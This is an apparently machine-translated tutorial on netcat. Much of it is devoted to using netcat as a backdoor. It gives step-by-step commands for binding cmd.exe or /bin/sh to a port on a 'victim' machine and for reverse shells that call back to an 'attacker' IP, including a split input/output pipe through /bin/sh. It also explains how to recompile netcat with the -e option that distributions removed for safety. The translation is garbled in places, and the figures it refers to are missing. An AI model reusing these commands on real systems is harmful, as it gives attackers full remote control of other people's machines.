Linux Netcat usage

Netcat (NC) is known as the Swiss army knife in the network security field. I believe many people know it. It is a simple but practical tool that reads and writes data through a TCP or UDP network connection. It is designed as a stable backdoor tool that can be easily driven by other programs and scripts. At the same time, it is also a powerful network debugging and testing tool that can establish almost all types of network connections you need, and there are several interesting built-in functions. This article describes how to use NC in Windows and Linux. It also introduces several Linux configuration techniques.

NC is a command line tool. There are not many methods to use it in Windows and Linux (for example, the Windows machine tested in this article is WINXP + SP2, And the Linux machine is redhat9.0 ), we can use nc-H (this command can be used only in the NC directory in windows, and the NC directory must be added to the path in Linux ). We can see one:

 
Figure 1: NC-H in Windows
Generally, the Linux/Unix system comes with the NC tool by default, but it may be for security considerations. The-e parameter was removed in later NC versions. In Linux, we can see the nc-H as shown in Figure 2. By comparing figure 1 and figure 2, we can clearly see that two parameters are missing in Linux, they are-D and-e.

 
Figure 2: NC-H in Linux

From nc-H, we can see how to use each parameter. The basic format of NC is:
NC [-options] hostname port [s] [ports]...
NC-l-P port [Options] [hostname] [port]
The following describes the meaning and usage of each parameter:
-D background Mode
-E prog program redirection, Once connected, it will be executed [dangerous!] // We can bind CMD in Windows to/bin/sh in Linux through shell binding. This is very dangerous and our entire system is completely transparent to others, we can see from the example below. This is why the-e parameter is removed by default in Linux.
-The number of hops in the G gateway source routing mode. The maximum value is 8.
-The number of nodes in the G source routing mode, which is generally 4, 8, 12,... n-H help information.
-I secs latency Interval
-L listening mode for inbound connection
-L continue listening after the connection is closed
-N: the IP address of the specified number. The hostname cannot be used.
-O file records hexadecimal Transmission
-P port: local port number
-R random local and remote ports
-S ADDR local source address
-T use Telnet Interaction Mode
-U udp Mode
-V detailed output -- use two-V to get more detailed content
-W secs: Specifies the scanning time
-Z: Turn off the input and output -- used for scanning

 

The following is an example of how to use NC:

1: Listen to the port of the local machine:
NC-l-P port // port specifies the local port number of the listener
 

Figure 3: Listening to port 80 of the Local Machine

2: Scan remote hosts:
The common format is: NC-VV-z-W. You want to scan the IP port range // The number
Specifies the scan interval.
 

Figure 4: remote host Scanning

3: bind the host shell as a backdoor
This generally involves two steps:
Step 1: run the following command on the attacked machine: NC-V-l-P port number-e shell // example, which is usually/bin/sh in Linux.
Step 2: The attacker uses the command: NC to remotely control the victim's machine by using the IP Port Number of the attacker.

In the following example, we bind the cmd.exe in Windows to port 80 and then control it on a Linux machine.
 

Figure 5: bind cmd.exe to port 80 on Windows
 

Figure 6: connect to port 80 bound to the machine above
From figure 6, we can see that in linux, we have completely achieved the same kind of cmd.exe in windows, and we can remotely and completely control windows as locally, so that if we run the format command, the consequences can be imagined.

4: bind shell to the host and reverse connect

You can use either of the following methods:
Method 1:
There are two steps:
Step I: attackers can specify the port number to be listened to on their own machines and use the following command:
The Port Number of the NC-VV-l-P listener.

 

Step II: On the victim (attacked) machine, we bind the shell to the port listened by the attacker's machine.
 

Figure 7: bind CMD in Windows to port 9999 on the Linux machine
At this time, we will see the following situation in Step 1:
 

Figure 8: cmd.exe obtained on the linuxlinuxmachine that monitors the status

 

We can see that we have full control over the victim's machine.
Method 2:
We can even bind the input and output windows to two different ports,
In this way, we enter a command in a window, and the result of this command is output in a window.
Two steps:
Step I: On the attacker's machine, we use the following two commands:
NC-VV-l-P Port 1
NC-VV-l-P Port 2 // here we will bind Port 1 to the input window, and Port 2 to the output window.
Step II: run the following command on the victim's machine:
NC attacker machine IP Port 1 | shell | NC attacker machine IP Port 2
// The shell here is the same as the shell mentioned in the example. In windowscmd.exe,
In Linux,/bin/sh
In the following example, we use the command NC 192.168.1.34 9999 |/bin/sh | NC 192.168.1.34 8888 to bind the shell (I .e./bin/sh) in Linux) to our Windows Server (IP Address: 192.168.1.34), the "|" in the middle is the pipe, indicating that the port 9999 is bound to our input window, bind port 8888 to our output window.
 

Figure 9: bind port 9999 as the input window

Figure 10: bind port 8888 as the output window

Figure 11: bind a shell to the input and output windows on the Linux machine
When we enter the LS command in the input window
 

Figure 12: Enter the LS command in the binding port 9999 input window

 

In our output window, we can see the output result of the above LS command.
 

Figure 13: The result of the LS command is displayed in the output window of the binding port 8888.

Careful readers may find that I didn't say that shell cannot be bound in Linux by default. Why did we bind/bin/sh to the port in Windows in Figure 11 above? This is indeed a good problem. It is true that Linux removes the default-e parameter for security considerations, but it does not matter. We can download an NC by ourselves, compile the program to include the-e parameter.
We downloaded nc110.tgz to our Linux machine, but we found that we used
Decompress tar-zxvf nc110.tgz, and then use
Gcc-o-s-dgaping_security_hole-dtelnet-dlinux-static-o nc Netcat. C. The fourteen error message is displayed, saying "undefined reference to '_ res_init '".

Why is this happening? This is because Netcat. in C, the main function calls the res_init () function, which is a function in glibc. Now it is changed to _ res_init (). We can use the SED command to modify Netcat. C or change res_init () to _ res_init () directly in VI. This is the compilation method we can use the above GCC command, and the GCC parameter-s ensures the Strip operation, in this way, we have an NC with the-e parameter on the Linux machine. We can use nc-h to see the NC parameter list, as shown in the 15th, we can see, the-e parameter option is already available.

Figure 15: NC with the-e parameter in Linux

Now we can bind/bin/sh to a port and control the shell through a Windows machine. Sixteen, Fig. 17. When we input nc-E/bin/sh-l-P 9999 on the Linux machine, the system remains in the listening status, we listen to port 9999 on Windows, and then we can enter the Linux Command to remotely control the shell.
 

Figure 16: bind/bin/sh to port 9999
 

Figure 17: using Windows to listen to port 9999 to obtain the shell

I also downloaded nc110.tgz to the FreeBSD system. After testing, I found that Netcat does not need to be modified in FreeBSD. in C, res_init () can be directly compiled using the GCC command to generate an NC with the-e parameter. The FreeBSD system used for testing is FreeBSD 4.6-release.

NC is indeed a very popular and useful tool in the network security and hacker world. NC is used in many ways. Here we only introduce several of the most common usage, I also introduced the methods and techniques for re-compiling NC with the-e parameter in Linux, and hope to help you.